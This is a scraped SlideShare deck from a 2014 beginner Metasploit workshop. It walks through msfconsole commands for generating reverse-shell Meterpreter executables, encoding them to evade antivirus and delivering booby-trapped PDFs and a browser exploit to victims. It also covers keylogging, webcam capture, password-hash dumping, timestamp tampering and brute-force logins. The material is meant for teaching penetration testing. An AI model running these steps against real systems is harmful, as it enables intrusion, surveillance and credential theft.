SlideShare a Scribd company logo

Metasploit Humla for Beginner

n|u - The Open Security Community
n|u - The Open Security Community

null Bangalore Chapter - June 28th 2014 Humla

EducationTechnology
1 of 74
Download to read offline
By : Ajay Srivastava
Please don’t expect ….  How to evade antiviruses (antivirus evasion)  How to do pivoting  How to do port forwarding  How to write your own metasploit module
Disclaimer All the information or technique you will be learning here is for educational purpose and should not be used for malicious activities.
Agenda  Introduction  Basics of Metasploit  Information gathering  Exploitation  ( 11:30-11:45 - Break 1/ Tea )*  Meterpreter Basics  Post exploitation using meterpreter  Meterpeter scripts  ( 1:00 – 2:00 - Break 2 / Lunch )*
Agenda  Metasploit utilities  Client-side exploitation  ( 4:00-4:20 – Break 3 / Tea )*  Auxiliary module  And we are done   * Lunch and Tea are self sponsored.
Introduction  It’s not a Tool, it’s a Framework !!!
History  Developed by H.D Moore in 2003  Originally written in Perl & later on rewritten in Ruby  Acquired by Rapid7 in 2009  Remains open source & free for use
Metasploit Architecture
Libraries  Rex :  The basic library for most tasks  Handles sockets and protocols  MSF CORE :  Defines the Metasploit Framework  Provides the ‘basic’ API  MSF BASE :  Provides the ‘friendly’ API  Provides simplified APIs for use in the Framework
Modules  Exploit  Modules used for actually attacking the systems and grabbing the access.  Payload  Piece of code which executes on remote system after successful exploitation.  Auxiliary  Exploit without payload. Used for scanning, fuzzing & doing various tasks.
Modules  Encoders  Program which encodes our payload to avoid antivirus detection  Nops  Used to keep payload size consistent
Payloads  Single  Completely standalone  eg: Add user  Stagers  Creates the network connection  Stages  Downloaded by the stagers  eg: Meterpreter
Payloads  Payload is staged if represented by ‘/’ in the payload name  Windows/shell_bind_tcp  single payload with no stage  Windows/shell/bind_tcp  a stager (bind_tcp)  a stage (shell)
Interfaces  MSFCONSOLE  MSFCLI  MSFWEB  Armitage
MSFCONSOLE  Most powerful interface among all interfaces
MSFCLI
MSFWEB
Armitage  Graphical version of Metasploit  Developed by Raphel Mudge  Supports both GUI & CLI
Armitage
Basics Commands  #msfconsole  #msfupdate  MSFConsole commands are classified in two types :  Core Commands  Database commands
Core Commands  help or ?  banner  version  show  search  msf>search <module name>  info  msf>info <module name>  use  msf>use <exploit/auxiliary name>
Core Commands  back  show options  set  msf>set <option> <value>  setg  msf>set <option> <value>  unset  msf>set <option> <value>  unsetg  msf>set <option> <value>
Core Commands  show payloads  set payload  msf>set payload <payload name>  check  exploit  run
Database Commands  Default database : PostgreSQL  Database.yml  /opt/metasploit/apps/pro/ui/config/database.yml  # cat database.yml  db_status  db_disconnect
Database Commands  Db_connect #db_connect user:pass@localhost:port/dbname OR #db_connect –y <path of database.yml>
Database Commands  db_nmap  # db_nmap –sV –A –O <ip range>  hosts  # hosts –h  services  # services
Database Commands  vulns  db_export  db_import  db_rebuild_cache  creds  db_load  db_unload
Information Gathering  Auxiliary modules are the best !!!  Will cover in detail later  Using auxiliary/scanner/portscan/tcp  # msf>auxiliary/scanner/portscan/tcp Or  nmap <switches> <ip address>
Exploitation  To list available exploits :  msf> search <exploit name>  To select an exploit :  msf> use <exploit name>  To get information about selected exploits  msf/exploitname> info  To check the options and set arguments  msf/exploitname> show options  To set the target host  msf/exploitname> set rhost <victim ip>
Exploitation  To list supported payload with selected exploit  msf/exploitname> show payloads  To set the payload  msf/exploitname> set payload <payload name>  To set attacker machine  msf/exploitname> Set lhost <own ip>  To check if target is vuln to selected exploit  msf/exploitname> Check  To launch the attack  msf/exploitname> exploit
Meterpreter  Post exploitation module  Runs in the exploited process context  Runs in memory and doesn’t create any file on disk  Encrypted communication  Stable and extensible
Meterpreter  Classification  Core commands  File system commands  System commands  User interface commands  Priv commands  Networking commands
Meterpreter : Core commands  background  sessions  ps  migrate  bgrun/bglist/bgkill  resource
Meterpreter : Core commands  Run  #msf>run <script name>  Channel  #msf>execute –f <program> -c  Use  #msf>use <extension name>
Meterpreter:File System Commands  pwd  cd  getlwd/getlcd  ls  cat/edit  download/upload
Meterpreter:File System Commands  search  #msf>search –d <directory> -f *.<fileformat> -r  mkdir/rmdir  rm/rmdir  del
Meterpreter : System Commands  sysinfo  getpid/getuid  shell  reboot  shutdown  ps
Meterpreter : UI Commands  User interface & Webcam commands  idletime  keyscan_start  keyscan_dump  keyscan_stop  webcam_list  webcam_snap
Meterpreter : Privs Commands  getsystem  hashdump  timestomp  timestomp –h  timestomp <filepath> -v { to display all atributes}  timestomp <filepath> -c <MM/DD/YYYY H:M:S>
Meterpreter: Networking commands  arp  ipconfig/ifconfig  netstat  route  portfwd
Meterpreter scripts  Path :  /usr/share/metasploit-framework/scripts/meterpreter  Or  meterpreter>run <tab multiple times>
Meterpreter scripts run <script name>  run checkvm  run credcollect  run keylogrecorder  run winenum  run getcountermeasure  run getgui
Meterpreter scripts  run scraper  run hostedit  run gettelnet  run arpscanner  run vnc  run filecollector  #msf>run filecollector –d <dnm> -f *.txt -r
Metasploit Utilities  Three main utilities to generate shellcode and to evade antiviruses  Msfpayload  Msfencode  Msfvenom
Msfpayload  To generate payload in different formats as exe ,C , Ruby and javascript  Using msfpayload :  root@kali:~# msfpayload -h  To check options  root@kali:~# msfpayload <payload name> O  root@:~# msfpayload windows/meterpreter/reverse_tcp O  Setting the options  root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 X > exploit.exe  Sending this exploit.exe to victim
Using Mutli-handler Exploit / setting listener  Setup listner:  msf > search multi/handler  msf > use exploit/multi/handler  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  msf exploit(handler) > show options  msf exploit(handler) > set lhost <attacker ip>  msf exploit(handler) > set lport 4422  msf exploit(handler) > exploit
MSFEncode  To bypass antiviruses  Alters code , by converting into binary EXE. While interacting back , it will decode and execute the same into memory.  Payload is encoded by different encoders
MSFEncode  root@kali:~# msfencode -h  Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>  OPTIONS:  -e <opt> The encoder to use  -c <opt> The number of times to encode the data  -t <opt> The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe  -x <opt> Specify an alternate executable template  -k Keep template working; run payload in new thread (use with -x)
MSFEncode  list encoders:  root@kali:~# msfencode –l  msfencode with msfpayload:  root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe > /var/www/exploitbypass.exe
Client-side Attacks  Difficult to find server-side vulnerabilities  Most enterprises have incoming connections locked down with firewalls  Client-side attacks are the most common ones: - Browser based attacks - Social engineering attacks using malicious link or file
Client-side Attacks:Browser based  Using IE 6 based Aurora exploit  msf > search aurora  msf > use exploit/windows/browser/ms10_002_aurora  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set srvhost <attacker ip>  msf exploit(ms10_002_aurora) > set srvport 80  msf exploit(ms10_002_aurora) > set uripath /test
Client-side Attacks:Browser based  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set lhost <own ip>  msf exploit(ms10_002_aurora) > set lport 443  msf exploit(ms10_002_aurora) > exploit
Client-side Attacks:File Format  Nowadays file format based exploits are exploiting targets in wild.  File formats such as pdf , doc or rtf are sent as attachment to the victim and expected to open it.  For eg:  Adobe util.printf() Bufferoverflow vulnerability  MS14-017 Microsoft Word RTF Object Confusion
Client-side Attacks:File Format  Exploiting Adobe util.printf() Bufferoverflow vulnerability  msf > search adobe_utilprintf  msf > use exploit/windows/fileformat/adobe_utilprintf  msf exploit(adobe_utilprintf) > set filename resume.pdf  msf exploit(adobe_utilprintf) > show options  msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
Client-side Attacks:File Format  msf exploit(adobe_utilprintf) > setg lhost <attacker ip>  msf exploit(adobe_utilprintf) > set lport 443  msf exploit(adobe_utilprintf) > exploit  Setup listener(i.e multi/handler)  Send this resume.pdf using some social engineering techniques.
Client-side Attacks:File Format  Setting up listener on local machine :  msf > search multi/handler  msf > use exploit/multi/handler  msf exploit(handler) > show options  msf exploit(handler) > set lhost <own ip>  msf exploit(handler) > set lport 443  msf exploit(handler) > exploit
Auxiliary Modules  Pre-exploitation module  Port scanners, fuzzers, banner grabbers, brute-force module etc.  Path:  /usr/share/metasploit-framework/modules/auxiliary or  Using show auxiliary on msfconsole :  msf > show auxiliary  Used without payloads
Auxiliary Modules  Used same as exploits but without payload  msf> use <auxiliary name>  ‘run’ command instead of ‘exploit’ command  RHOSTS instead of RHOST
Auxiliary Modules : Port scanners  Portscanner auxiliary module used for port scanning  Using portscanners :  msf > search portscan  msf > use auxiliary/scanner/portscan/tcp  msf auxiliary(tcp) > show options  msf auxiliary(tcp) > set rhosts <target>  msf auxiliary(tcp) > set ports 1-100  msf auxiliary(tcp) > set threads 10  msf auxiliary(tcp) > run
Auxiliary Modules : SMB version fingerprinting  msf > search smb_version  msf > use auxiliary/scanner/smb/smb_version  msf auxiliary(smb_version) > show options  msf auxiliary(smb_version) > set rhosts 192.168.37.0/24  msf auxiliary(smb_version) > set threads 10  msf auxiliary(smb_version) > run
Auxiliary Modules : Version Scanner  Banner grabbing of MySQL server :  msf > search MySQL  msf > use auxiliary/scanner/mysql/mysql_version  msf auxiliary(mysql_version) > show options  msf auxiliary(mysql_version) >set rhosts <target>  msf auxiliary(mysql_version) > run
Auxiliary Modules: Login Scanners  Testing login attack on MySQL :  msf > use auxiliary/scanner/mysql/mysql_login  msf auxiliary(mysql_login) > show options  msf auxiliary(mysql_login) > setg rhosts <target>  msf auxiliary(mysql_login) > set user_file userfile.txt
Auxiliary Modules: Login Scanners  msf auxiliary(mysql_login) > set pass_file passfile.txt  msf auxiliary(mysql_login) > set stop_on_success true  msf auxiliary(mysql_login) > run
Auxiliary Modules : Telnet  msf > search telnet_login  msf > use auxiliary/scanner/telnet/telnet_login  msf auxiliary(telnet_login) > show options  msf auxiliary(telnet_login)) > setg rhosts <target ip>  msf auxiliary(telnet_login) > set user_file userfile.txt
Auxiliary Modules : Telnet  msf auxiliary(telnet_login) > set pass_file passfile.txt  msf auxiliary(telnet_login) > set stop_on_success true  msf auxiliary(telnet_login) > run  Verify:  root@kali:~# telnet <target ip>
Auxiliary Modules : Attacking FTP  msf > search ftp_version  msf > use auxiliary/scanner/ftp/ftp_version  msf auxiliary(ftp_version) > show options  msf auxiliary(ftp_version) > set rhosts <target>  msf auxiliary(ftp_version) > run  Result on metasploitable2: FTP Banner: '220 (vsFTPd 2.3.4)
Auxiliary Modules : Attacking FTP  Now checking for ftp login  msf > search ftp_login  msf > use auxiliary/scanner/ftp/ftp_login  msf auxiliary(ftp_login) > set rhosts <target ip>  msf auxiliary(ftp_login) > set user_file userfile.txt  msf auxiliary(ftp_login) > set pass_file passfile.txt  msf auxiliary(ftp_login) > set stop_on_success true  msf auxiliary(ftp_login) > run  Successful FTP login for 'msfadmin':'msfadmin'
Auxiliary Modules : Attacking FTP  From FTP version scan we know its version is vsFTPd 2.3.4  Now looking for exploit of this FTP version  msf > search vsFTPd 2.3.4  msf > use exploit/unix/ftp/vsftpd_234_backdoor  msf exploit(vsftpd_234_backdoor) > show options  msf exploit(vsftpd_234_backdoor) > set rhost <target ip>  msf exploit(vsftpd_234_backdoor) > show payloads  msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact  msf exploit(vsftpd_234_backdoor) > exploit
References  Metasploit Guide, http://packetstormsecurity.com/files/119280,  Securitytube Metasploit Framework Expert (SMFE course by Vivek Ramachandran)  Metasploit Unleashed ,  http://www.offensive-security.com/metasploit- unleashed/Main_Page
Metasploit Humla for Beginner

Recommended

Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Apache kafka 모니터링을 위한 Metrics 이해 및 최적화 방안
Apache kafka 모니터링을 위한 Metrics 이해 및 최적화 방안Apache kafka 모니터링을 위한 Metrics 이해 및 최적화 방안
Apache kafka 모니터링을 위한 Metrics 이해 및 최적화 방안SANG WON PARK
 
Metasploit
MetasploitMetasploit
MetasploitLalith Sai
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Kafka monitoring using Prometheus and Grafana
Kafka monitoring using Prometheus and GrafanaKafka monitoring using Prometheus and Grafana
Kafka monitoring using Prometheus and Grafanawonyong hwang
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 

Recommended

Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Apache kafka 모니터링을 위한 Metrics 이해 및 최적화 방안
Apache kafka 모니터링을 위한 Metrics 이해 및 최적화 방안Apache kafka 모니터링을 위한 Metrics 이해 및 최적화 방안
Apache kafka 모니터링을 위한 Metrics 이해 및 최적화 방안SANG WON PARK
 
Metasploit
MetasploitMetasploit
MetasploitLalith Sai
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Kafka monitoring using Prometheus and Grafana
Kafka monitoring using Prometheus and GrafanaKafka monitoring using Prometheus and Grafana
Kafka monitoring using Prometheus and Grafanawonyong hwang
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개
[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개
[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개OpenStack Korea Community
 
Nmap
NmapNmap
NmapSreekanth Narendran
 
Docker swarm
Docker swarmDocker swarm
Docker swarmAlberto Guimarães Viana
 
Spring IO 2023 - Dynamic OpenAPIs with Spring Cloud Gateway
Spring IO 2023 - Dynamic OpenAPIs with Spring Cloud GatewaySpring IO 2023 - Dynamic OpenAPIs with Spring Cloud Gateway
Spring IO 2023 - Dynamic OpenAPIs with Spring Cloud GatewayIván López Martín
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)shwetha mk
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with MetasploitMohammed Danish Amber
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Nmap tutorial
Nmap tutorialNmap tutorial
Nmap tutorialVarun Kakumani
 
OpenTelemetry For Architects
OpenTelemetry For ArchitectsOpenTelemetry For Architects
OpenTelemetry For ArchitectsKevin Brockhoff
 
NMAP
NMAPNMAP
NMAPPrateekAryan1
 
NMap
NMapNMap
NMapPritesh Raka
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdfFarouk2nd
 
Security Testing
Security TestingSecurity Testing
Security TestingKiran Kumar
 
Spring security
Spring securitySpring security
Spring securitySaurabh Sharma
 
Monitoring_with_Prometheus_Grafana_Tutorial
Monitoring_with_Prometheus_Grafana_TutorialMonitoring_with_Prometheus_Grafana_Tutorial
Monitoring_with_Prometheus_Grafana_TutorialTim Vaillancourt
 
Penetration Testing AWS
Penetration Testing AWSPenetration Testing AWS
Penetration Testing AWSSanjeev Kumar Jaiswal
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacksMichael Gough
 
Metasploit
MetasploitMetasploit
MetasploitParth Sahu
 
Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: MetasploitKasper de Waard
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6Nutan Kumar Panda
 

More Related Content

What's hot

[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개
[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개
[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개OpenStack Korea Community
 
Spring IO 2023 - Dynamic OpenAPIs with Spring Cloud Gateway
Spring IO 2023 - Dynamic OpenAPIs with Spring Cloud GatewaySpring IO 2023 - Dynamic OpenAPIs with Spring Cloud Gateway
Spring IO 2023 - Dynamic OpenAPIs with Spring Cloud GatewayIván López Martín
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)shwetha mk
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
OpenTelemetry For Architects
OpenTelemetry For ArchitectsOpenTelemetry For Architects
OpenTelemetry For ArchitectsKevin Brockhoff
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdfFarouk2nd
 
Security Testing
Security TestingSecurity Testing
Security TestingKiran Kumar
 
Monitoring_with_Prometheus_Grafana_Tutorial
Monitoring_with_Prometheus_Grafana_TutorialMonitoring_with_Prometheus_Grafana_Tutorial
Monitoring_with_Prometheus_Grafana_TutorialTim Vaillancourt
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacksMichael Gough
 

What's hot (20)

[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개
[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개
[OpenInfra Days Korea 2018] (Track 2) Neutron LBaaS 어디까지 왔니? - Octavia 소개
 
Nmap
NmapNmap
Nmap
 
Docker swarm
Docker swarmDocker swarm
Docker swarm
 
Spring IO 2023 - Dynamic OpenAPIs with Spring Cloud Gateway
Spring IO 2023 - Dynamic OpenAPIs with Spring Cloud GatewaySpring IO 2023 - Dynamic OpenAPIs with Spring Cloud Gateway
Spring IO 2023 - Dynamic OpenAPIs with Spring Cloud Gateway
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Nmap tutorial
Nmap tutorialNmap tutorial
Nmap tutorial
 
OpenTelemetry For Architects
OpenTelemetry For ArchitectsOpenTelemetry For Architects
OpenTelemetry For Architects
 
NMAP
NMAPNMAP
NMAP
 
NMap
NMapNMap
NMap
 
Bypass_AV-EDR.pdf
Bypass_AV-EDR.pdfBypass_AV-EDR.pdf
Bypass_AV-EDR.pdf
 
Security Testing
Security TestingSecurity Testing
Security Testing
 
Spring security
Spring securitySpring security
Spring security
 
Monitoring_with_Prometheus_Grafana_Tutorial
Monitoring_with_Prometheus_Grafana_TutorialMonitoring_with_Prometheus_Grafana_Tutorial
Monitoring_with_Prometheus_Grafana_Tutorial
 
Penetration Testing AWS
Penetration Testing AWSPenetration Testing AWS
Penetration Testing AWS
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacks
 
Metasploit
MetasploitMetasploit
Metasploit
 

Similar to Metasploit Humla for Beginner

Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal PanchmahalkarPrajwal Panchmahalkar
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Ishan Girdhar
 
Chapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsChapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsMeenalJabde
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
 
Proactive monitoring with Monit
Proactive monitoring with MonitProactive monitoring with Monit
Proactive monitoring with MonitOSOCO
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 

Similar to Metasploit Humla for Beginner (20)

Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: Metasploit
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Dev ops
Dev opsDev ops
Dev ops
 
Metapwn
MetapwnMetapwn
Metapwn
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Chapter 3 Using Unix Commands
Chapter 3 Using Unix CommandsChapter 3 Using Unix Commands
Chapter 3 Using Unix Commands
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
 
Proactive monitoring with Monit
Proactive monitoring with MonitProactive monitoring with Monit
Proactive monitoring with Monit
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 

More from n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

More from n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Recently uploaded

General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024Janet Corral
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajanpragatimahajan3
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Disha Kariya
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
